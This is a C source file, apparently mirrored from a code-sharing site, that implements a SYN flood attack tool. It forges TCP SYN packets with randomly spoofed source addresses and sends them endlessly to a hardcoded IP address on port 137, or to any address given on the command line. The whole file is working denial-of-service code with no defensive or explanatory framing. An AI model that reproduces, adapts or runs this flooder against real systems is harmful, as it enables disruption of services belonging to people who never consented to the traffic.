www.pudn.com > src00 > SYN_FLOOD.C, change:2001-11-24,size:3305b

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define DST_PORT	137
static char *dst_addr = "128.255.252.46";


struct pseudo_header
{
	unsigned long src_addr;
	unsigned long dst_addr;
	unsigned char zero;
	unsigned char proto;
	unsigned short length;
}__attribute__ ((packed));

int 	create_raw_socket(void);
int 	send_frag_ip_pkt(int);
u_short in_cksum(u_short *, int);

static u_short ip_id = 0x789;

int main(int argc, char *argv[])
{
	int sock = create_raw_socket();
	int n = 0;

	if(argc>=2) {
		dst_addr = argv[1];
	}

	srand(time(NULL));

	while(1) {

		printf("%d: Sending IP packet ... ", n++);
		fflush(stdout);
		if(send_frag_ip_pkt(sock)<0) {
			perror("sendto");
			return -1;
		}

		printf("done\n");

		if( (n%1000)==0 ) 
			sleep(1);

	}

	close(sock);

	return 0;
}

int create_raw_socket(void)
{
	int	sock;
	int	on = 1;

	sock = socket(AF_INET, SOCK_RAW,  IPPROTO_ICMP);
	if(sock<0) {
		perror("socket");
		exit(1);
	}

	if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on))<0) {
		perror("setsockopt");
		exit(1);
	}

	return sock;
}

int send_frag_ip_pkt(int sd)
{
	struct  sockaddr_in sin;
	unsigned char	buf[20 + 20 +4];
	unsigned char	chkbuf[512];

	char	local_addr[32];
	struct	iphdr	*iph;
	struct	tcphdr	*tcph;
	struct  pseudo_header *ph;
	u_short *port;
	int	i;
	
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = inet_addr(dst_addr);
	sin.sin_port = 0;

	sprintf(local_addr, "192.168.0.%u", 1 + ((unsigned)rand())%253 );

	memset(buf, 0, sizeof(buf));
	
	iph = (struct iphdr *)buf;
	iph->ihl	= 5;
	iph->version	= 4;
	iph->tos	= 0;
	iph->tot_len	= sizeof(buf);
	iph->id		= ip_id++;
	iph->frag_off	= 0;
	iph->ttl	= 255;
	iph->protocol	= IPPROTO_TCP;
	iph->check	= 0;
	iph->saddr	= inet_addr(local_addr);
	iph->daddr	= inet_addr(dst_addr);
	
	iph->check 	= in_cksum((u_short *)buf, 20);

	tcph = (struct tcphdr *)&buf[20];

	tcph->source  = htons((u_short)(2000 + rand() % 1000));
	tcph->dest    = htons(DST_PORT);
	tcph->seq     = (unsigned short)rand();
	tcph->ack_seq = 0;
	tcph->doff    = 6;			/* data offset */
	tcph->syn     = 1;
	
	tcph->window  = htons(8000);
	tcph->check   = 0;
	tcph->urg_ptr = 0;

	buf[40] = TCPOPT_MAXSEG;
	buf[41] = 4;

	*(unsigned short *)(buf + 42) = htons(1460);
	
	for(i=44; i<sizeof(buf); i++)
		buf[i] = rand();


	ph = (struct pseudo_header *)chkbuf;
	ph->src_addr = iph->saddr;
	ph->dst_addr = iph->daddr;
	ph->zero = 0;
	ph->proto = iph->protocol;
	ph->length = htons(sizeof(buf) - sizeof(*iph));
	memcpy(chkbuf + sizeof(*ph), &buf[sizeof(*iph)], sizeof(buf) - sizeof(*iph));

	tcph->check = in_cksum((u_short *)chkbuf, sizeof(buf) - sizeof(*iph) + sizeof(*ph));

	return sendto(sd, buf, sizeof(buf), 0,  
                      (struct sockaddr *)&sin, 
                      sizeof(sin));
}



u_short in_cksum(u_short *addr, int len)
{
	int	nleft = len;
	int	sum   = 0;
	u_short *w = addr;
	u_short answer = 0;

	while(nleft > 1) {
		sum += *w;
		w++;
		nleft -= 2;
	}

	if(nleft == 1) {
		*(unsigned char *)(&answer) = *(unsigned char *)w;
		sum += answer;
	}

	sum = (sum>>16) + (sum & 0xffff);
	sum += (sum>>16);
	
	answer = ~sum;

	return answer;
}